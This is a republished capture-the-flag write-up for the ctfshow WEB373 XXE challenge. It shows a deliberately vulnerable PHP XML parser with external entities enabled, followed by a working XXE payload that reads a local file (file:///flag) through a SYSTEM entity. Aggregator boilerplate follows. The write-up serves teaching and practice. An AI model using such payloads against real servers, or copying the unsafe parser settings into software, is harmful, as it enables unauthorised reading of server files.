ctfshow_XXE

Others 2021-03-27 22:32:08 views: null

Article Directory

WEB373

Let's first take a look at the XXE vulnerability in understanding the vulnerability
Insert picture description here

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    
    
    $dom = new DOMDocument();  //创建内部类Document对象
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);通过解析一个 XML 标签字符串来组成该文档。
    $creds = simplexml_import_dom($dom); //把 DOM 节点转换为 SimpleXMLElement 对象。
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__);

The payload is released directly here:

<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<yu22x>
<ctfshow>&xxe;</ctfshow>
</yu22x>

Get flag
Insert picture description here

WEB374

Guess you like

Origin blog.csdn.net/qq_45951598/article/details/113753663
Recommended
The United States plans to restrict the export of large AI models to China and Russia
Apple to reach agreement with OpenAI to bring ChatGPT to iPhone
Ranking
whisper-webui installation tutorial is silky and easy to use
[Base] Laravel concepts laravel basis, the custom service provider: Contracts, ServiceContainer, ServiceProvider, Facades relations
Import torchvision error problem solving DLL: module not found
observer & watch & notify = pub & sub
A small turntable program [HTML + CSS + JS]
CorelDRAW 2018 shortcuts Daquan
Supervise el botón de menú para lograr un gatillo de presión prolongada
JS将时间秒转换成天小时分钟秒的字符串
RIP basic configuration
[Deleted] solution to a problem a few questions (Noip1994)
Daily
More
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)

Code World

© 2018 codetd.com